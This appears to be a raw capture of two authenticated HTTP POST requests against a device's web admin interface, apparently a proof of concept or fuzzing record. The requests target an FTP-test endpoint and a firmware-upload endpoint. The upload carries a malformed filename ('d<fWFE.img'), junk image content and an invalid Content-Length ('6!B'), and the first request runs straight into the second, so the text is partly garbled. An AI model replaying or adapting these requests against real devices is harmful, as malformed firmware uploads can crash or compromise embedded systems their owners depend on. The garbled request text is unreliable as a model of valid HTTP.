POST /setTestFTP HTTP/1.1
Host: 2.65.87.200
Content-Length: 74
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="_00", nonce="4981be60ff28fe3ccb29ee0a784e037d", uri="/setTestFTP", response="23122fc8ddf83be9807847422f258aef", qop=auth, nc=000000d5, cnonce="d3490f6f6c4f416c"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://2.65.87.200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://2.65.87.200/ftptest.htm
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

ReplySuccessPage=stsftp.htm&ReplyErrorPage=replyp.htm&FTPServerTest=+Test+POST /setFirmwareUpgrade HTTP/1.1
Host: 2.65.87.200
Content-Length: 6!B
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="_00", nonce="4981be60ff28fe3ccb29ee0a784e037d", uri="/setFirmwareUpgrade", response="4d928f18b81afd3c92ecd6cf8081e1f0", qop=auth, nc=00000149, cnonce="8375412dcf710f1f"
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://2.65.87.200
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynzBw878OXEP03lmK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://2.65.87.200/upgrade.htm
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundarynzBw878OXEP03lmK
Content-Disposition: form-data; name="ReplySuccessPage"

replyu.htm
------WebKitFormBoundarynzBw878OXEP03lmK
Content-Disposition: form-data; name="ReplyErrorPage"

replyk.htm
------WebKitFormBoundarynzBw878OXEP03lmK
Content-Disposition: form-data; name="ForceBootCodeUpgrade"

0
------WebKitFormBoundarynzBw878OXEP03lmK
Content-Disposition: form-data; name="DownloadFile"; filename="d<fWFE.img"
Content-Type: application/vnd.efi.img

dfQRFWEFQFQGVERGETHWR
------WebKitFormBoundarynzBw878OXEP03lmK
Content-Disposition: form-data; name="DownloadCSRV"

Upgrade
------WebKitFormBoundarynzBw878OXEP03lmK--
